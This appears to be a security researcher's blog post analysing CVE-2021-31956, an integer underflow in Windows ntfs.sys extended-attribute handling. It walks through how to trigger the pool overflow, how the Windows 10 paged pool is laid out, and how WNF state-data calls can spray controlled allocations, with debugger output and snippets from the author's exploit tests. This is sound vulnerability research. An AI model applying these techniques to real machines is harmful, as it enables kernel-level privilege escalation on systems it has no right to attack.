Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation in Windows caused by a kernel memory corruption bug, which was patched in the June 2021 Patch Tuesday.

Microsoft describe the vulnerability in their advisory, which notes that many versions of Windows are affected and that the issue has been exploited in the wild in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in a series and describes the vulnerability, the initial constraints from an exploit development perspective and, finally, how WNF can be abused to obtain a number of exploit primitives. The series will also cover the exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically, the code above loops through each NTFS extended attribute (Ea) for a file and copies it from the Ea Block into the output buffer based on the size ea_block->EaValueLength + ea_block->EaNameLength + 9 (the 8-byte fixed header of the structure plus the NUL terminator of the name).

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.
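To make the arithmetic easier to follow, here is a minimal C model of the loop as described above. It is a sketch under stated assumptions, not the decompiled ntfs.sys code: the `ea_entry` type and `simulate_query_ea` function are hypothetical, each entry only carries its two length fields, and no data is actually copied. The function reports how many bytes would land past the end of an `out_buf_length`-byte output buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical entry: only the two length fields matter for the check. */
typedef struct {
    uint8_t  name_length;   /* EaNameLength  */
    uint16_t value_length;  /* EaValueLength */
} ea_entry;

/* Simplified model of the copy loop described in the text (not the
 * decompiled ntfs.sys code). Returns how many bytes would be written past
 * the end of an output buffer that is out_buf_length bytes long. */
static uint32_t simulate_query_ea(const ea_entry *eas, size_t count,
                                  uint32_t out_buf_length)
{
    const uint32_t buffer_size = out_buf_length; /* real allocation size */
    uint32_t offset = 0;    /* where the next entry is copied to */
    uint32_t padding = 0;   /* alignment owed by the previous entry */
    uint32_t overflow = 0;

    for (size_t i = 0; i < count; i++) {
        /* 8-byte fixed header + name + NUL terminator + value */
        uint32_t ea_block_size =
            (uint32_t)eas[i].value_length + eas[i].name_length + 9u;

        /* The flawed check: out_buf_length - padding can wrap around. */
        if (ea_block_size > out_buf_length - padding)
            break; /* buffer too small, stop copying */

        offset += padding;
        uint32_t end = offset + ea_block_size;
        if (end > buffer_size) /* count only bytes past the real end */
            overflow += end - (offset > buffer_size ? offset : buffer_size);
        offset = end;

        out_buf_length -= ea_block_size + padding;
        padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
    }
    return overflow;
}
```

For instance, a 30-byte buffer holding two entries with EaNameLength 5 and EaValueLength 4 yields 0, while an 18-byte buffer followed by an entry with EaValueLength 47 yields a non-zero overflow, because `out_buf_length - padding` wraps around on the second iteration.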

Putting some example numbers into this, let's assume the following: the file has two extended attributes.

At the first iteration of the loop we could have the following values:

    EaNameLength  = 5
    EaValueLength = 4
    ea_block_size = 9 + 5 + 4 = 18
    padding       = 0

So, assuming that 18 <= out_buf_length - 0, the data would be copied into the buffer. We will use an out_buf_length of 30 for this example.

    out_buf_length = 30 - (18 + 0)
    out_buf_length = 12                      // we would have 12 bytes left of the output buffer
    padding = ((18 + 3) & 0xFFFFFFFC) - 18
    padding = 2

We could then have a second extended attribute in the file with the same values:

    EaNameLength  = 5
    EaValueLength = 4
    ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the following setup, where out_buf_length is 18.

First extended attribute:

    EaNameLength  = 5
    EaValueLength = 4

Second extended attribute:

    EaNameLength  = 5
    EaValueLength = 47

First iteration of the loop:

    EaNameLength  = 5
    EaValueLength = 4
    ea_block_size = 9 + 5 + 4    // 18
    padding       = 0

The resulting check is:

    18 <= 18 - 0    // is True and a copy of 18 bytes occurs.

    out_buf_length = 18 - (18 + 0)
    out_buf_length = 0           // We would have 0 bytes left of the output buffer.
    padding = ((18 + 3) & 0xFFFFFFFC) - 18
    padding = 2

Our second extended attribute has the following values:

    EaNameLength  = 5
    EaValueLength = 47
    ea_block_size = 5 + 47 + 9
    ea_block_size = 61

The resulting check will be:

    ea_block_size <= out_buf_length - padding
    61 <= 0 - 2

Because out_buf_length and padding are unsigned 32-bit values, 0 - 2 wraps around to 0xFFFFFFFE and the check passes. At this point we have underflowed the check, and 61 bytes will be copied off the end of the buffer, corrupting the adjacent memory.
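The root cause is the unsigned subtraction. The sketch below contrasts the check as described in the text with a hypothetical rewrite that never subtracts from `out_buf_length`; the rewrite is purely illustrative and is not claimed to be how Microsoft actually patched ntfs.sys. Both function names are made up for this example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* The check as described in the text: with out_buf_length = 0 and
 * padding = 2, the right-hand side wraps to 0xFFFFFFFE. */
static bool vulnerable_check(uint32_t ea_block_size, uint32_t out_buf_length,
                             uint32_t padding)
{
    return ea_block_size <= out_buf_length - padding;
}

/* Hypothetical safe variant: add instead of subtract, widened to 64 bits
 * so the sum cannot wrap either. */
static bool safe_check(uint32_t ea_block_size, uint32_t out_buf_length,
                       uint32_t padding)
{
    return (uint64_t)ea_block_size + padding <= out_buf_length;
}
```

With out_buf_length = 0 and padding = 2, `vulnerable_check` accepts any block size, whereas `safe_check` rejects it; for the first, well-behaved example both agree.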

Looking at the caller of this function, NtfsCommonQueryEa, we can see that the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers of NtfsCommonQueryEa, we can see that the NtQueryEaFile system call path reaches the vulnerable code.

The Zw version of this system call, ZwQueryEaFile, is documented by Microsoft.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled-size allocation in kernel space based on the size of the buffer. However, to trigger this vulnerability, we also need to cause the underflow described above.

In order to trigger the underflow, we need to set our output buffer size to be the length of the first Ea Block.

Provided the first Ea Block requires padding (i.e. its size is not a multiple of 4), the second Ea Block will be written out of bounds of the buffer when it is queried.

The interesting things about this vulnerability from an attacker's perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values are not restricted in what they can contain.

2) The overflow is linear and will corrupt any adjacent pool chunks.

3) The attacker has control over the size of the pool chunk allocated.

However, the question is whether this can be exploited reliably in the presence of modern kernel pool mitigations, and whether this is a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The Zw version of the function NtSetEaFile, ZwSetEaFile, is also documented by Microsoft.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the first 18 bytes of the buffer (offsets 0 to 17).

This is followed by 2 bytes of padding, with the second extended attribute starting at offset 20.

    typedef struct _FILE_FULL_EA_INFORMATION {
        ULONG  NextEntryOffset;
        UCHAR  Flags;
        UCHAR  EaNameLength;
        USHORT EaValueLength;
        CHAR   EaName[1];
    } FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that the NextEntryOffset of the first EA block is set to the offset of the overflowing EA, including the padding (20). For the overflowing EA block, NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size we want our vulnerable buffer allocation to be (minus the pool header), and the second extended attribute block contains the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed to NtQueryEaFile then, provided there is padding, the check will underflow and the second extended attribute block will be copied with an attacker-controlled size.
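The buffer layout itself can be sketched in portable C, without calling NtSetEaFile. This is a minimal sketch, assuming a little-endian host (as on x64 Windows) and mirroring only the fixed 8-byte part of FILE_FULL_EA_INFORMATION; `ea_header`, `write_ea` and `build_ea_chain` are hypothetical names, not part of any Windows API.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Portable mirror of the fixed part of FILE_FULL_EA_INFORMATION
 * (ULONG, UCHAR, UCHAR, USHORT); EaName starts right after it. */
typedef struct {
    uint32_t NextEntryOffset;
    uint8_t  Flags;
    uint8_t  EaNameLength;
    uint16_t EaValueLength;
} ea_header;

static_assert(sizeof(ea_header) == 8, "fixed EA header is 8 bytes");

/* Writes one entry (header, NUL-terminated name, value) at dst with
 * NextEntryOffset = 0 and returns its unpadded size: 9 + name + value. */
static uint32_t write_ea(uint8_t *dst, const char *name,
                         const uint8_t *value, uint16_t value_len)
{
    ea_header h = {0};
    h.EaNameLength = (uint8_t)strlen(name);
    h.EaValueLength = value_len;

    memcpy(dst, &h, sizeof h);
    memcpy(dst + sizeof h, name, h.EaNameLength + 1u); /* include the NUL */
    memcpy(dst + sizeof h + h.EaNameLength + 1u, value, value_len);
    return (uint32_t)sizeof h + h.EaNameLength + 1u + value_len;
}

/* Hypothetical helper: lays out the two-entry chain for NtSetEaFile.
 * Entry 1 points at the 4-byte aligned start of entry 2, which ends the
 * chain. Returns the total buffer length; *first_size receives the size
 * of entry 1, i.e. the Length to pass to NtQueryEaFile later.
 * dst must be large enough for both entries plus up to 3 padding bytes. */
static uint32_t build_ea_chain(uint8_t *dst,
                               const char *name1, const uint8_t *val1, uint16_t len1,
                               const char *name2, const uint8_t *val2, uint16_t len2,
                               uint32_t *first_size)
{
    uint32_t size1 = write_ea(dst, name1, val1, len1);
    uint32_t next = (size1 + 3u) & ~3u;       /* aligned start of entry 2 */
    memset(dst + size1, 0, next - size1);     /* zero the padding bytes */
    uint32_t size2 = write_ea(dst + next, name2, val2, len2);

    memcpy(dst, &next, sizeof next);          /* entry 1 NextEntryOffset */
    *first_size = size1;
    return next + size2;
}
```

With an 18-byte first entry, entry 1's NextEntryOffset comes out as 20. With a 94-byte first entry and a 59-byte second entry, it gives a NextEntryOffset of 96 and a total of 155, which agrees with the WriteEaOverflow debug output shown later in this post.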

So, in summary, once the extended attributes have been written to the file using NtSetEaFile, it is then necessary to trigger the vulnerable code path by calling NtQueryEaFile with an output buffer size exactly equal to the size of our first extended attribute.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of material on kernel pool exploitation for older versions of Windows, but not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes with the introduction of userland Segment Heap concepts into the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv, a brilliant paper on this topic which also proposes some initial techniques. Without this paper having already been published, exploitation of this issue would have been significantly harder.

Firstly, the important thing is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We need to determine which of the four “backends” the chunk lives on:

- Low Fragmentation Heap (LFH)

- Variable Size Heap (VS)

- Segment Allocation

- Large Alloc

I started off using the NtQueryEaFile Length value of 0x12 from above, which resulted in a vulnerable chunk of size 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool

ffff9a069986f010 size: 30 previous size: 0 (Allocated) Ntf0

ffff9a069986f040 size: 30 previous size: 0 (Free) ....

ffff9a069986f070 size: 30 previous size: 0 (Free) ....

ffff9a069986f0a0 size: 30 previous size: 0 (Free) CMNb

ffff9a069986f0d0 size: 30 previous size: 0 (Free) CMNb

ffff9a069986f100 size: 30 previous size: 0 (Allocated) Luaf

ffff9a069986f130 size: 30 previous size: 0 (Free) SeSd

ffff9a069986f160 size: 30 previous size: 0 (Free) SeSd

ffff9a069986f190 size: 30 previous size: 0 (Allocated) Ntf0

ffff9a069986f1c0 size: 30 previous size: 0 (Free) SeSd

ffff9a069986f1f0 size: 30 previous size: 0 (Free) CMNb

ffff9a069986f220 size: 30 previous size: 0 (Free) CMNb

ffff9a069986f250 size: 30 previous size: 0 (Allocated) Ntf0

ffff9a069986f280 size: 30 previous size: 0 (Free) SeGa

ffff9a069986f2b0 size: 30 previous size: 0 (Free) Ntf0

ffff9a069986f2e0 size: 30 previous size: 0 (Free) CMNb

ffff9a069986f310 size: 30 previous size: 0 (Allocated) Ntf0

ffff9a069986f340 size: 30 previous size: 0 (Free) SeSd

ffff9a069986f370 size: 30 previous size: 0 (Free) APpt

*ffff9a069986f3a0 size: 30 previous size: 0 (Allocated) *NtFE

Pooltag NtFE : Ea.c, Binary : ntfs.sys

ffff9a069986f3d0 size: 30 previous size: 0 (Allocated) Ntf0

ffff9a069986f400 size: 30 previous size: 0 (Free) SeSd

ffff9a069986f430 size: 30 previous size: 0 (Free) CMNb

ffff9a069986f460 size: 30 previous size: 0 (Free) SeUs

ffff9a069986f490 size: 30 previous size: 0 (Free) SeGa

This is due to the size of the allocation being below 0x200.

We can step through the corruption of the adjacent chunk by setting a conditional breakpoint on the following location:

    bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'"

We then set a breakpoint on the memcpy location.

This example ignores some common sizes which are hit often on 20H2, as this code path is used frequently by the system during normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true; however, it demonstrates that even more restrictive constraints can often be worked around, and that you should always try to fully understand the constraints of your bug before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see the following memory layout:

!pool @r9

*ffff8001668c4d80 size: 30 previous size: 0 (Allocated) *NtFE

Pooltag NtFE : Ea.c, Binary : ntfs.sys

ffff8001668c4db0 size: 30 previous size: 0 (Free) C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80

nt!_POOL_HEADER

+0x000 PreviousSize : 0y00000000 (0)

+0x000 PoolIndex : 0y00000000 (0)

+0x002 BlockSize : 0y00000011 (0x3)

+0x002 PoolType : 0y00000011 (0x3)

+0x000 Ulong1 : 0x3030000

+0x004 PoolTag : 0x4546744e

+0x008 ProcessBilled : 0x0057005c`007d0062 _EPROCESS

+0x008 AllocatorBackTraceIndex : 0x62

+0x00a PoolTagHash : 0x7d

This is followed by 0x12 bytes of the data itself.

This means that the chunk size calculation will be 0x12 + 0x10 = 0x22, which is then rounded up to a 0x30 chunk.
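The same calculation can be written as a small helper. This is a sketch, assuming the allocation lands in an LFH bucket and that buckets use 16-byte granularity, which holds for the 0x30 and 0x70 sizes observed in this post but is not claimed for every size class. `lfh_chunk_size` and `pool_block_size` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

#define POOL_HEADER_SIZE 0x10u  /* sizeof(_POOL_HEADER) on x64 */
#define POOL_GRANULARITY 0x10u  /* BlockSize is counted in 16-byte units */

/* Chunk size backing a paged pool request of request_len bytes:
 * pool header plus data, rounded up to 16-byte granularity (assumed). */
static uint32_t lfh_chunk_size(uint32_t request_len)
{
    uint32_t raw = request_len + POOL_HEADER_SIZE;
    return (raw + POOL_GRANULARITY - 1u) & ~(POOL_GRANULARITY - 1u);
}

/* BlockSize as stored in _POOL_HEADER: chunk size in 16-byte units. */
static uint8_t pool_block_size(uint32_t chunk_size)
{
    return (uint8_t)(chunk_size / POOL_GRANULARITY);
}
```

A Length of 0x12 gives a 0x30 chunk with BlockSize 3, matching the dt output above, and a Length of 94 gives the 0x70 chunk seen in the next example.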

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, the following values overflow from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from my testing code):

    NtCreateFile is located at 0x773c2f20 in ntdll.dll
    RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
    NtSetEaFile is located at 0x773c42e0 in ntdll.dll
    NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
    WriteEaOverflow EaBuffer1->NextEntryOffset is 96
    WriteEaOverflow EaLength1 is 94
    WriteEaOverflow EaLength2 is 59
    WriteEaOverflow Padding is 2
    WriteEaOverflow ea_total is 155
    NtSetEaFileN sucess
    output_buf_size is 94
    GetEa2 pad is 1
    GetEa2 Ea1->NextEntryOffset is 12
    GetEa2 EaListLength is 31
    GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size: 70 previous size: 0 (Allocated) NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows paged pool manipulation than on the non-paged pool, and to our knowledge nothing at all has been publicly written so far about using WNF structures for exploitation primitives.

WNF Introduction

The Windows Notification Facility is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF-related structures are used by Windows.



Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into the non-paged pool and the session pool, but less from a paged pool perspective. As this overflow occurs within the paged pool, we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

    nt!_WNF_STATE_DATA
       +0x000 Header : _WNF_NODE_HEADER
       +0x004 AllocatedSize : Uint4B
       +0x008 DataSize : Uint4B
       +0x00c ChangeStamp : Uint4B

This is pointed to by the _WNF_NAME_INSTANCE structure’s StateData pointer:

    nt!_WNF_NAME_INSTANCE
       +0x000 Header : _WNF_NODE_HEADER
       +0x008 RunRef : _EX_RUNDOWN_REF
       +0x010 TreeLinks : _RTL_BALANCED_NODE
       +0x028 StateName : _WNF_STATE_NAME_STRUCT
       +0x030 ScopeInstance : Ptr64 _WNF_SCOPE_INSTANCE
       +0x038 StateNameInfo : _WNF_STATE_NAME_REGISTRATION
       +0x050 StateDataLock : _WNF_LOCK
       +0x058 StateData : Ptr64 _WNF_STATE_DATA
       +0x060 CurrentChangeStamp : Uint4B
       +0x068 PermanentDataStore : Ptr64 Void
       +0x070 StateSubscriptionListLock : _WNF_LOCK
       +0x078 StateSubscriptionListHead : _LIST_ENTRY
       +0x088 TemporaryNameListEntry : _LIST_ENTRY
       +0x098 CreatorProcess : Ptr64 _EPROCESS
       +0x0a0 DataSubscribersCount : Int4B
       +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value, to which 16 is added to account for the 0x10-byte _WNF_STATE_DATA header prepended to the data.

Therefore, the allocation starts with a 0x10-byte _POOL_HEADER, as follows:

    1: kd> dt _POOL_HEADER
    nt!_POOL_HEADER
       +0x000 PreviousSize : Pos 0, 8 Bits
       +0x000 PoolIndex : Pos 8, 8 Bits
       +0x002 BlockSize : Pos 0, 8 Bits
       +0x002 PoolType : Pos 8, 8 Bits
       +0x000 Ulong1 : Uint4B
       +0x004 PoolTag : Uint4B
       +0x008 ProcessBilled : Ptr64 _EPROCESS
       +0x008 AllocatorBackTraceIndex : Uint2B
       +0x00a PoolTagHash : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

    nt!_WNF_STATE_DATA
       +0x000 Header : _WNF_NODE_HEADER
       +0x004 AllocatedSize : Uint4B
       +0x008 DataSize : Uint4B
       +0x00c ChangeStamp : Uint4B

With the arbitrary-sized data following the structure.
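Putting the two headers together, the layout of one WNF state data allocation can be mirrored in portable C. This is a sketch under assumptions: `_WNF_NODE_HEADER` is modelled as two 16-bit fields (consistent with AllocatedSize sitting at offset 0x4), the chunk is assumed to be rounded to 16 bytes, and `wnf_state_data` and `wnf_chunk_size` are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed layout of _WNF_NODE_HEADER: 4 bytes in total. */
typedef struct {
    uint16_t NodeTypeCode;
    uint16_t NodeByteSize;
} wnf_node_header;

/* Mirror of the _WNF_STATE_DATA dt output (x64); user data follows it. */
typedef struct {
    wnf_node_header Header;   /* +0x000 */
    uint32_t AllocatedSize;   /* +0x004 */
    uint32_t DataSize;        /* +0x008 */
    uint32_t ChangeStamp;     /* +0x00c */
} wnf_state_data;

static_assert(offsetof(wnf_state_data, AllocatedSize) == 0x4, "layout");
static_assert(offsetof(wnf_state_data, DataSize) == 0x8, "layout");
static_assert(offsetof(wnf_state_data, ChangeStamp) == 0xc, "layout");
static_assert(sizeof(wnf_state_data) == 0x10, "layout");

/* Chunk size for an update of `length` bytes: 0x10-byte _POOL_HEADER plus
 * the (length + 16) requested from ExAllocatePoolWithQuotaTag, rounded up
 * to 16 bytes (assumed LFH granularity). */
static uint32_t wnf_chunk_size(uint32_t length)
{
    uint32_t raw = 0x10u + (uint32_t)sizeof(wnf_state_data) + length;
    return (raw + 0xFu) & ~0xFu;
}
```

Under these assumptions, any update of 1 to 0x10 bytes lands in a 0x30 chunk, the size used for the spray that follows.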

To track the allocations we make using this function, we can use:

    bp nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

    NtCreateWnfStateName(state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
    NtUpdateWnfStateData(state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190

Pool page ffffbe0f623d7190 region is Paged pool

ffffbe0f623d7020 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7050 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7080 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d70b0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d70e0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7110 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7140 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

*ffffbe0f623d7170 size: 30 previous size: 0 (Allocated) *Wnf Process: ffff87056ccc0080

Pooltag Wnf : Windows Notification Facility, Binary : nt!wnf

ffffbe0f623d71a0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d71d0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7200 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7230 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7260 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7290 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d72c0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d72f0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7320 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7350 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7380 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d73b0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d73e0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7410 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7440 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7470 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d74a0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d74d0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7500 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7530 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7560 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7590 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d75c0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d75f0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7620 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7650 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7680 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d76b0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d76e0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7710 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7740 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7770 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d77a0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d77d0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7800 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7830 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7860 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7890 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d78c0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d78f0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7920 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7950 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7980 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d79b0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d79e0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7a10 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7a40 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7a70 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7aa0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7ad0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7b00 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7b30 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7b60 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7b90 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7bc0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7bf0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7c20 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7c50 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7c80 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7cb0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7ce0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7d10 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7d40 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7d70 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7da0 size: 30 previous size: 0 (Allocated) Ntf0

ffffbe0f623d7dd0 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

ffffbe0f623d7e00 size: 30 previous size: 0 (Allocated) Wnf Process: ffff87056ccc0080

